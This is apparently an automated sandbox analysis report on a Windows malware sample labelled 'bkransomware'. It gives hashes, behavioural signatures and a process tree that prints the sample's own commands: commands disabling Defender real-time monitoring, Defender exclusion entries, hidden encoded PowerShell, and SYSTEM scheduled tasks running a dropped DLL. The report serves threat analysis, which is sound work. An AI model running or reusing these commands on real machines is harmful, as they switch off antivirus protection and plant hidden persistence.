Analysis
-
max time kernel
96s -
max time network
98s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
20/11/2024, 10:35
General
-
Target
2024-11-20_f994bb58737568a5d9549aba27765817_bkransomware.exe
-
Size
6.5MB
-
MD5
f994bb58737568a5d9549aba27765817
-
SHA1
775e2ca46093b3c1da6f75892688ce32188a4286
-
SHA256
bae538268f69192376e800c6a1145d98f10c53d52a5c140a8946c4d0cc1fefcb
-
SHA512
e97ab6c13c27734acdc588ed953bd906548b7588d3d49cf0c1432d90fd85f296b8d54dc8e9b3d03f92af0e34bedf018a50bbbf1ced6103c0df2b8864eea6488d
-
SSDEEP
196608:mr0oklsXtdc6LhccHBBNFXMR8osjcJvnc3VYN9:InXtdcI7DQsjc1nYiN9
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 30 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Indirect Command Execution 1 TTPs 1 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 8 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-11-20_f994bb58737568a5d9549aba27765817_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-20_f994bb58737568a5d9549aba27765817_bkransomware.exe"1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaLUsommH" /SC once /ST 03:44:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaLUsommH"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaLUsommH"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:322⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:642⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxFBJtRJY" /SC once /ST 08:36:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxFBJtRJY"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxFBJtRJY"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"2⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:642⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\OnhNpPaMzJMsBlOt\FiChuSSU\NBpjziWraToRcTdL.wsf"2⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\OnhNpPaMzJMsBlOt\FiChuSSU\NBpjziWraToRcTdL.wsf"2⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzQmVBDU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzQmVBDU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WgvytFsLYgBOZHOrTkR" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WgvytFsLYgBOZHOrTkR" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XCoeaKLADIUn" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XCoeaKLADIUn" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eQklilqgHwOfC" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eQklilqgHwOfC" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpcixqkJzVDU2" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpcixqkJzVDU2" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NpSuaNqPYDJSGZVB" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NpSuaNqPYDJSGZVB" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kownoHBJhKbQorKWi" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kownoHBJhKbQorKWi" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzQmVBDU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzQmVBDU" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WgvytFsLYgBOZHOrTkR" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WgvytFsLYgBOZHOrTkR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XCoeaKLADIUn" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XCoeaKLADIUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eQklilqgHwOfC" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eQklilqgHwOfC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpcixqkJzVDU2" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpcixqkJzVDU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NpSuaNqPYDJSGZVB" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NpSuaNqPYDJSGZVB" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kownoHBJhKbQorKWi" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kownoHBJhKbQorKWi" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OnhNpPaMzJMsBlOt" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMUNDsYtY" /SC once /ST 07:15:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMUNDsYtY"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMUNDsYtY"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:322⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:642⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gfYySKQepeGPdRmOL"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfYySKQepeGPdRmOL"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gfYySKQepeGPdRmOL2"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfYySKQepeGPdRmOL2"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lBNssezkZSTRXahrB"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lBNssezkZSTRXahrB"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lBNssezkZSTRXahrB2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lBNssezkZSTRXahrB2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nJveATwKjxiGMiGqjwn"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nJveATwKjxiGMiGqjwn"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nJveATwKjxiGMiGqjwn2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nJveATwKjxiGMiGqjwn2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UgrzuIQeYIzmXFucJJG"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UgrzuIQeYIzmXFucJJG"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UgrzuIQeYIzmXFucJJG2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UgrzuIQeYIzmXFucJJG2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\FGzQmVBDU\pbQASK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UzeKAwGyzqkhqRo" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RlrClFEiCDIAHhY"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RlrClFEiCDIAHhY"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RlrClFEiCDIAHhY2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RlrClFEiCDIAHhY2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rjQTlhFSLxNXGo"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rjQTlhFSLxNXGo"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "llPwLaUEGhLCR"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "llPwLaUEGhLCR"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "llPwLaUEGhLCR2"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "llPwLaUEGhLCR2"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UzeKAwGyzqkhqRo2" /F /xml "C:\Program Files (x86)\FGzQmVBDU\SyEraSL.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UzeKAwGyzqkhqRo"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UzeKAwGyzqkhqRo"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zkunOwhAULIHXb" /F /xml "C:\Program Files (x86)\qpcixqkJzVDU2\ymcolZg.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yaQNivpiFKiYX2" /F /xml "C:\ProgramData\NpSuaNqPYDJSGZVB\eIlnsgi.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lBNssezkZSTRXahrB2" /F /xml "C:\Program Files (x86)\WgvytFsLYgBOZHOrTkR\teQakPT.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UgrzuIQeYIzmXFucJJG2" /F /xml "C:\Program Files (x86)\eQklilqgHwOfC\xgMioyQ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 2362⤵
- Program crash
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CBCAD39C-75F3-4DA5-82F7-B3C99A7E2B03} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
